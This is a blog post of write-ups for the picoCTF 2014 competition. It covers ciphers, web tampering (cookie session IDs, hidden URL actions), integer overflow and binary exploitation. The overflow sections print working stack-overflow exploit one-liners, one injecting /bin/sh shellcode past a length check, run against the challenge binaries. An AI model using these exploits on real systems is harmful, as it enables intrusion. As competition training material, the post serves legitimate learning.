picoCTF 2014

2014. 11. 19. 03:38

Hello! Today I'm going to write simple writeups(without reasonings) to wrap-up what I've solved in the picoctf2014. Please feel free to ask questions for specific problems/reasonings in the comments. Hope you enjoy.

Tyrannosaurus Hex - 10

The contents of the flash drive appear to be password protected. On the back of the flash drive, you see the hexadecimal number 0x912d2e43 scribbled in ink. The password prompt, however, only accepts decimal numbers. What number should you enter?

0x912d2e43=2435657283

No Comment - 20

The CD you find has a copy of your father's website: homepage.html. Maybe something is hidden in the site...

Chrome right click, click inspect element;

""

Common Vulnerability Exercise - 20

This disc is encrypted. The surprisingly elaborate password hint refers to "the CVE Identifier for a 2014 vulnerability that allowed arbitrary code execution in Firefox via a buffer overflow in a speech codec". If you found this "CVE-ID" thingy, it'd probably be the password.

Go to https://cve.mitre.org and put in for keyword, 'arbitrary code execution in Firefox via a buffer overflow in a speech codec'. Plug in a few cve's; CVE-2014-1542

Caesar - 20

You find an encrypted message written on the documents. Can you decrypt it?
encrypted.txt:

vjgugetgvrcuurjtcugkudnekgavqkpsqvzvihlvwmrwbpqtiha

go to http://nayuki.eigenstate.org/page/automatic-caesar-cipher-breaker-javascript
click break code! after entering the message.

thesecretpassphraseisblcieytoinqotxtgfjtukpuznorgfy

The Valley of Fear - 20

The hard drive may be corrupted, but you were able to recover a small chunk of text. Scribbled on the back of the hard drive is a set of mysterious numbers. Can you discover the meaning behind these numbers? (1, 9, 4) (4, 2, 8) (4, 8, 3) (7, 1, 5) (8, 10, 1)

(Paragraph #, Line #, Word # from left side) makes up "the flag is Ceremonial plates"

Internet Inspection - 30

On his computer, your father left open a browser with the Thyrin Lab Website. Can you find the hidden access code?

Open Google Chrome, go to inspect elements, open tab on the gridded bit of the website -> flag_9128b5712ce17849f619b5a082e4367f7a9c0d08

RoboPhoto - 30

Your father has been known to use the titles of his favorite books as passwords. While you don't remember any of the names of the books, your father keeps a poster for one of them on his wall. Can you figure out the name of the book and unlock the CD?

Go to google images and paste the image's url, hit enter. The Positronic Man

This is the Endian - 40

This is the end! Solving this challenge will help you defeat Daedalus's cyborg. You can find more information about endianness and the problem here. The flag is the smallest possible program input that causes the program to print "Access Granted".

0x52657663 & 0x30646521 in little endian-" \x63\x76\x65\x52 & \x21\x65\x64\x30". Plug the values into 'data preview' below; \x63\x76\x65\x52\x21\x65\x64\x30; You get the values in ASCII. cveR!ed0

Supercow - 40

Daedalus Corp. has a special utility for printing .cow files at /home/daedalus/supercow. Can you figure out how to get it to print out the flag?

Simply symbolic link the txt file into cow file.

pico19855@shell:~$ cd /home/daedalus

pico19855@shell:/home/daedalus$ ls

flag.txt hint.cow secret1.cow secret2.cow supercow supercow.c

pico19855@shell:/home/daedalus$ ./supercow secret1.cow

____________

< cow_text_1 >

------------

\ ^__^

\ (oo)\_______

(__)\ )\/\

||----w |

|| ||

pico19855@shell:/home/daedalus$ ln -s flag.txt /home_users/pico19855/asdf.cow

pico19855@shell:/home/daedalus$ ./supercow /home_users/pico19855/asdf.cow

______________

< I_LOV_BNANAS >

--------------

\ ^__^

\ (oo)\_______

(__)\ )\/\

||----w |

|| ||

Grep is Still Your Friend - 40

The police need help decrypting one of your father's files. Fortunately you know where he wrote down all his backup decryption keys as a backup (probably not the best security practice). You are looking for the key corresponding to daedaluscorp.txt.enc. The file is stored on the shell server at /problems/grepfriend/keys.

Grep it.

pico19855@shell:/home/daedalus$ cd /problems/grepfriend

pico19855@shell:/problems/grepfriend$ grep "daedaluscorp.txt.enc" *

daedaluscorp.txt.enc b2bee8664b754d0c85c4c0303134bca6

pico19855@shell:/problems/grepfriend$

Javascrypt - 40

Tyrin Robotics Lab uses a special web site to encode their secret messages. Can you determine the value of the secret key?

alert(key); on your javascript console. (The key differs.)

The page at https://picoctf.com says: flag_3645

Easy Overflow - 40

Is the sum of two positive integers always positive?
nc vuln2014.picoctf.com 50000
'nc' is the Linux netcat command. Try running it in the shell.

If an integer overflows, it becomes negative.

pico19855@shell:~$ nc vuln2014.picoctf.com 50000

Your number is 1712058. Can you make it negative by adding a positive integer?

2145771590

Congratulations! The sum is -2147483648. Here is the flag: That_was_easssy!

Thanks for playing.

Write Right - 50

Can you change the secret? The binary can be found at /home/write_right/ on the shell server. The source can be found here.

pico19855@shell:/home/write_right$ cat write_right.c

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>

unsigned secret = 0xdeadbeef;

int main(int argc, char **argv){

unsigned *ptr;

unsigned value;

char key[33];

FILE *f;

printf("Welcome! I will grant you one arbitrary write!\n");

printf("Where do you want to write to? ");

scanf("%p", &ptr);

printf("Okay! What do you want to write there? ");

scanf("%p", (void **)&value);

printf("Writing %p to %p...\n", (void *)value, (void *)ptr);

*ptr = value;

printf("Value written!\n");

if (secret == 0x1337beef){

printf("Woah! You changed my secret!\n");

printf("I guess this means you get a flag now...\n");

f = fopen("flag.txt", "r");

fgets(key, 32, f);

fclose(f);

puts(key);

exit(0);

}

printf("My secret is still safe! Sorry.\n");

}

pico19855@shell:/home/write_right$ gdb -q write_right

Reading symbols from write_right...(no debugging symbols found)...done.

(gdb) disas main

Dump of assembler code for function main:

0x080485cd <+0>: push %ebp

<cont..>

0x0804865b <+142>: movl $0x8048831,(%esp)

0x08048662 <+149>: call 0x8048470 <puts@plt>

0x08048667 <+154>: mov 0x804a03c,%eax //address of variable 'secret'-overwrite this.

0x0804866c <+159>: cmp $0x1337beef,%eax

<cont...>

0x080486fc <+303>: call 0x8048460 <__stack_chk_fail@plt>

0x08048701 <+308>: leave

0x08048702 <+309>: ret

End of assembler dump.

(gdb) x/wx 0x804a03c

0x804a03c <secret>: 0xdeadbeef

(gdb) q

pico19855@shell:/home/write_right$ ./write_right

Welcome! I will grant you one arbitrary write!

Where do you want to write to? 0x804a03c

Okay! What do you want to write there? 1337beef

Writing 0x1337beef to 0x804a03c...

Value written!

Woah! You changed my secret!

I guess this means you get a flag now...

arbitrary_write_is_always_right

pico19855@shell:/home/write_right$

Overflow 1 - 50

This problem has a buffer overflow vulnerability! Can you get a shell, then use that shell to read flag.txt? You can solve this problem interactively here, and the source can be found here.

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
void give_shell(){
 gid_t gid = getegid();
 setresgid(gid, gid, gid);
 system("/bin/sh -i"); 
}

 void vuln(char *input){
 char buf[16];
 int secret = 0;
 strcpy(buf, input);

 if (secret == 0xc0deface){
 give_shell(); 
}else{
 printf("The secret is %x\n", secret); 
}
 } 

int main(int argc, char **argv){
 if (argc > 1)
   vuln(argv[1]);
 return 0;
 }

pico19855@shell:/home/overflow1$ ls
flag.txt  Makefile  overflow1  overflow1.c      
pico19855@shell:/home/overflow1$ ./overflow1 `perl 
-e 'print "\x90"x16, "\xce\xfa\xde\xc0"'`          
$ cat flag.txt
ooh_so_critical

Toaster Control - 50

Daedalus Corp. uses a web interface to control some of their toaster bots. It looks like they removed the command 'Shutdown & Turn Off' from the control panel. Maybe the functionality is still there...

You see the url of any button: http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Blink%20Lights

Change it to http://web2014.picoctf.com/toaster-control-1040194/handler.php?action=Shutdown%20%26%20Turn%20Off

Toaster Defense System Controls

Shutting down

Shutdown code: flag_c49bdkeekr5zqgvc20vc

ZOR - 50

Daedalus has encrypted their blueprints! Can you get us the password?
ZOR.py
encrypted

ZOR.py:

#!/usr/bin/python


import sys

"""
Daedalus Corporation encryption script.
"""

def xor(input_data, key):
    result = ""
    for ch in input_data:
        result += chr(ord(ch) ^ key)

    return result

def encrypt(input_data, password):
    key = 0
    for ch in password:
        key ^= ((2 * ord(ch) + 3) & 0xff)

    return xor(input_data, key)

def decrypt(input_data, password):
    return encrypt(input_data, password)

def usage():
    print("Usage: %s [encrypt/decrypt] [in_file] [out_file] [password]" % sys.argv[0])
    exit()

def main():
    if len(sys.argv) < 5:
        usage()

    input_data = open(sys.argv[2], 'r').read()
    result_data = ""

    if sys.argv[1] == "encrypt":
        result_data = encrypt(input_data, sys.argv[4])
    elif sys.argv[1] == "decrypt":
        result_data = decrypt(input_data, sys.argv[4])
    else:
        usage()

    out_file = open(sys.argv[3], 'w')
    out_file.write(result_data)
    out_file.close()

main()

//Actually, I kinda got mixed here, so (i dont remember his name) thanks to the anonymous admin who made this prob. Helped a lot :)

Solution:

#!/usr/bin/python

input_data='Vjkq"ogqqceg"kq"dmp"Fcgfcnwq"Amprmpcvkml"mln{,"Mwp"`nwgrpklvq"dmp"vjg"A{`mpe"cpg"rpmvgavgf"ukvj"c"rcqqumpf,"Vjcv"rcqqumpf"kq":da0c251dc0gfffcd:f6a6`ca4c:`g'

password=[]

def xor(input_data, key):

result = ""

for ch in input_data:

result += chr(ord(ch) ^ key)

return result

for password in range (0,256):

result=xor(input_data, password)

print result + "\n"

output:

<gibberish..>

tHISMESSAGEISFORdAEDALUScORPORATIONONLYoURBLUEPRINTSFORTHEcYBORGAREPROTECTEDWITHAPASSWORDtHATPASSWORDISFCAFAEDDDAFDCBACABE

Substitution - 50

There's an authorization code for some Thyrin Labs information here, along with someone's favorite song. But it's been encrypted! Find the authorization code.
encrypted.txt:

mid ofminzujomunc snvd ug kumiobbmidsnbnzgnwmidkucv ynf miucq ue oc ulcnzocm gotold ocv ynftd addc gn eocy xbosdg u lfdgg um efgm ad gn afm gmubb u soccnm gdd uw mid gotold ncd ug ed ink soc midzd ad gn efsi miom ynf vncm qcnk ynf vncm qcnk ynf miucq ynf nkc kiomdtdz bocv ynf bocv nc mid dozmi ug rfgm o vdov miucl ynf soc sboue afm u qcnk dtdzy znsq ocv mzdd ocv szdomfzd iog o buwd iog o gxuzum iog o coed ynf miucq mid ncby xdnxbd kin ozd xdnxbd ozd mid xdnxbd kin bnnq ocv miucq buqd ynf afm uw ynf kobq mid wnnmgmdxg nw o gmzocldz ynfbb bdozc miuclg ynf cdtdz qcdk ynf cdtdz qcdk iotd ynf dtdz idozv mid knbw szy mn mid abfd snzc ennc nz ogqdv mid lzuccucl anasom kiy id lzuccdv soc ynf gucl kumi obb mid tnusdg nw mid enfcmoucg soc ynf xoucm kumi obb mid snbnzg nw mid kucv soc ynf xoucm kumi obb mid snbnzg nw mid kucv sned zfc mid iuvvdc xucd mzoubg nw mid wnzdgm sned mogmd mid gfcgkddm adzzudg nw mid dozmi sned znbb uc obb mid zusidg obb oznfcv ynf ocv wnz ncsd cdtdz kncvdz kiom midyzd knzmi mid zoucgmnze ocv mid zutdz ozd ey aznmidzg mid idznc ocv mid nmmdz ozd ey wzudcvg ocv kd ozd obb snccdsmdv mn dosi nmidz uc o suzsbd uc o innx miom cdtdz dcvg ink iuli kubb mid gysoenzd lznk uw ynf sfm um vnkc midc ynfbb cdtdz qcnk ocv ynfbb cdtdz idoz mid knbw szy mn mid abfd snzc ennc wnz kidmidz kd ozd kiumd nz snxxdz gquccdv kd cddv mn gucl kumi obb mid tnusdg nw mid enfcmoucg kd cddv mn xoucm kumi obb mid snbnzg nw mid kucv ynf soc nkc mid dozmi ocv gmubb obb ynfbb nkc ug dozmi fcmub ynf soc xoucm kumi obb mid snbnzg nw mid kucv

I always use this site. Go there and paste the text above.

the authorization code is withallthecolorsofthewind

you think im an ignorant savage and youve been so many places i guess it must be so but still i cannot see if the savage one is me how can there be so much that you dont know you dont know you think you own whatever land you land on the earth is ~ust a dead thing you can claim but i know every rock and tree and creature has a life has a spirit has a name you think the only people who are people are the people who look and think like you but if you walk the footsteps of a stranger youll learn things you never knew you never knew have you ever heard the wolf cry to the blue corn moon or asked the grinning bobcat why he grinned can you sing with all the voices of the mountains can you paint with all the colors of the wind can you paint with all the colors of the wind come run the hidden pine trails of the forest come taste the sunsweet berries of the earth come roll in all the riches all around you and for once never wonder what theyre worth the rainstorm and the river are my brothers the heron and the otter are my friends and we are all connected to each other in a circle in a hoop that never ends how high will the sycamore grow if you cut it down then youll never know and youll never hear the wolf cry to the blue corn moon for whether we are white or copper skinned we need to sing with all the voices of the mountains we need to paint with all the colors of the wind you can own the earth and still all youll own is earth until you can paint with all the colors of the wind

Function Address - 60

We found this program file on some systems. But we need the address of the 'find_string' function to do anything useful! Can you find it for us?

chanbin@ubuntu:~/ctf/pico2014$ wget https://picoctf.com/problem-static/reversing/function-address/problem

--2014-11-24 10:48:49-- https://picoctf.com/problem-static/reversing/function-address/problem

Resolving picoctf.com (picoctf.com)... 54.83.62.93

Connecting to picoctf.com (picoctf.com)|54.83.62.93|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 7266 (7.1K) [application/octet-stream]

Saving to: `problem'

100%[=====================================================================================>] 7,266 --.-K/s in 0s

2014-11-24 10:48:50 (1.07 GB/s) - `problem' saved [7266/7266]

chanbin@ubuntu:~/ctf/pico2014$ ls

problem

chanbin@ubuntu:~/ctf/pico2014$ chmod +x problem

chanbin@ubuntu:~/ctf/pico2014$ ./problem

Bet you can't find the address of find_string!

Did you know that "class" appears in "the following class" at index 14?

chanbin@ubuntu:~/ctf/pico2014$ gdb -q problem

Reading symbols from /home/chanbin/ctf/pico2014/problem...(no debugging symbols found)...done.

(gdb) p find_string

$1 = {<text variable, no debug info>} 0x8048444 <find_string>

(gdb)

Basic ASM - 60

We found this program snippet.txt, but we're having some trouble figuring it out. What's the value of %eax when the last instruction (the NOP) runs?

My first reaction: Omg plz why why at&t

I hand-calculated it. Some people were asking me for hints for this specific question, I just told them if I was able to do this, everyone else could.

Snippet.txt

# This file is in AT&T syntax - see http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm

# and http://en.wikipedia.org/wiki/X86_assembly_language#Syntax. Both gdb and objdump produce # AT&T syntax by default.

MOV $3187,%ebx //ebx=3187 MOV $26953,%eax //eax=26953 MOV $19902,%ecx //ecx=19902 CMP %eax,%ebx //compare eax and ebx JL L1 //Jump to L1 if ebx < eax JMP L2 //else jump to L2

L1: IMUL %eax,%ebx //ebx=eax*ebx, ebx=8539211 ADD %eax,%ebx //ebx+=eax, ebx=85926164 MOV %ebx,%eax //eax=ebx, eax=85926164 SUB %ecx,%eax //eax-=ecx, goto L3, eax=85906262 JMP L3

L2: IMUL %eax,%ebx //ebx=eax*ebx SUB %eax,%ebx //ebx+=eax MOV %ebx,%eax //eax=ebx ADD %ecx,%eax //eax-=ecx

L3:

NOP

Delicious! - 60

You have found the administrative control panel for the Daedalus Coperation Website: https://web2014.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?

I used the Google Chrome extension, EditThisCookie. In the cookie value <session_id> is your session stored. Change it to numbers 1~50 (50, I'd recommend,) and the flag pops up once you refresh the page.

Welcome! You've been here before.

Your session number is 50.

We'll be tracking you using this number whenever you visit this site.

You're logged in as Dr. Florian Richards.

Today's secret Daedalus code is: session_cookies_are_the_most_delicious

Overflow 2 - 70

This problem has a buffer overflow vulnerability! Can you get a shell? You can solve this problem interactively here, and the source can be found here.

shell login: pico19855                             
Password:                                          
pico19855@shell:/home/overflow2$ ls                
flag.txt  Makefile  overflow2  overflow2.c
pico19855@shell:/home/overflow2$ gdb -q overflow2
Reading symbols from overflow2...(no debugging symb
ols found)...done.
(gdb) p give_shell
$1 = {<text variable, no debug info>} 0x80484ad <gi
ve_shell>
(gdb) q                  
pico19855@shell:/home/overflow2$ ./overflow2 `perl 
-e 'print "\x90"x28, "\xad\x84\x04\x08"'`          
$ cat flag.txt                                     
controlling_%eip_feels_great

Cyborg Secrets - 80

You found a password protected binary on the cyborg relating to its defensive security systems. Find the password and get the shutdown code! You can find it on the shell server at /home/cyborgsecrets/cyborg-defense or you can download it here.

TBH: I have no memories of solving this (I remember asking about it tho,) I think I had used a more "professional" way when I first solved it but since the password is hardcoded(the hint) I just cat the program.

ZogHTODO: REMOVE DEBUG PASSWORD!DEBUG PASSWORD: 2manyHacks_Debug_Admin_Test____

                                             
pico19855@shell:/home/cyborgsecrets$ ./cyborg_defense 2manyHacks_Debug_Admin_Test              
______              
 _       _             _____                                               
|  _  \             | |     | |           /  __ \                                              
| | | |__ _  ___  __| | __ _| |_   _ ___  | /  \/ ___  _ __ _ __                               
| | | / _` |/ _ \/ _` |/ _` | | | | / __| | |    / _ \| '__| '_ \                              
| |/ / (_| |  __/ (_| | (_| | | |_| \__ \ | \__/\ (_) | |  | |_) |                             
|___/ \__,_|\___|\__,_|\__,_|_|\__,_|___/  \____/\___/|_|  | .__/                              
                                                           | |                                 
                                                           |_|                                 
Password: 2manyHacks_Debug_Admin_Test                                                          
Authorization successful.                                                                      
403-shutdown-for-what

No Overflow - 140

This tries to prevent a buffer overflow by asking you how long your input is! Exploit it anyways! The binary can be found at/home/no_overflow/ on the shell server. The source can be found here.

How to find where return address is: Start with about 260 bytes and make your way up until the eip gets changed. Thanks barrebas for answering some of my questions (as I solved this problem after the competition ended.)


The program limits what you enter. However, if you use a negative number, it won't notice, and also won't set a limit to your inputs.

Don't forget to ulimit -c unlimit in order to make a core file.

pico19855@shell:~$ cat no_overflow.c                                           
#include <stdlib.h>                                                                            
#include <stdio.h>                                                                             
#include <unistd.h>                                                                            
                                                                                               
#define BUFSIZE 256                                                                            
                                                                                               
void greet(int length){                                                                        
    char buf[BUFSIZE];                                                                         
    puts("What is your name?");                                                                
    read(0, buf, length);                                                                      
    printf("Hello, %s\n!", buf);                                                               
}                                                                                              
                                                                                               
void be_nice_to_people(){                                                                      
    gid_t gid = getegid();                                                                     
    setresgid(gid, gid, gid);                                                                  
}                                                                                              
                                                                                               
int main(int argc, char **argv){                                                               
    int length;                                                                                
    be_nice_to_people();                                                                       
                                                                                               
    puts("How long is your name?");                                                            
    scanf("%d", &length);                                                                      
                                                                                               
    if(length < BUFSIZE) //don't allow buffer overflow                                         
        greet(length);                                                                         
    else                                                                                       
        puts("Length was too long!");                                                          
}

pico19855@shell:~$ (echo -1; perl -e 'print "\x90"x245, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80", "\xd8\xd5\xff\xff"';cat)|./no_overflow

How long is your name?

What is your name?

perl: warning: Setting locale failed.

perl: warning: Please check that your locale settings:

LANGUAGE = (unset),

LC_ALL = (unset),

LC_CTYPE = "UTF-8",

LANG = "en_US.UTF-8"

are supported and installed on your system.

perl: warning: Falling back to the standard locale ("C").

Hello, 1Ph//shh/binPS嘯

莽咽昶苔嚆

Segmentation fault (core dumped)

pico19855@shell:~$ gdb -q -c core

[New LWP 5132]

Core was generated by `./no_overflow'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0 0xffffd6c5 in ?? ()

(gdb) x/40wx $esp-200

0xffffd5fc: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd60c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd61c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd62c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd63c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd64c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd65c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd66c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd67c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd68c: 0x90909090 0x90909090 0x90909090 0x90909090

(gdb)

0xffffd69c: 0x90909090 0x90909090 0x90909090 0x90909090

0xffffd6ac: 0x90909090 0x90909090 0x50c03190 0x732f2f68

0xffffd6bc: 0x622f6868 0xe3896e69 0x6e69622f 0x68732f2f

0xffffd6cc: 0x00000000 0xffffffff 0xffffd6ec 0xffffd79c

0xffffd6dc: 0xf7e4f39d 0xf7fc83c4 0xf7ffd000 0x0804860b

0xffffd6ec: 0xffffffff 0x08048600 0x00000000 0x00000000

0xffffd6fc: 0xf7e35a83 0x00000001 0xffffd794 0xffffd79c

0xffffd70c: 0xf7feacea 0x00000001 0xffffd794 0xffffd734

0xffffd71c: 0x0804a020 0x0804826c 0xf7fc8000 0x00000000

0xffffd72c: 0x00000000 0x00000000 0x1588b43a 0x2c92302a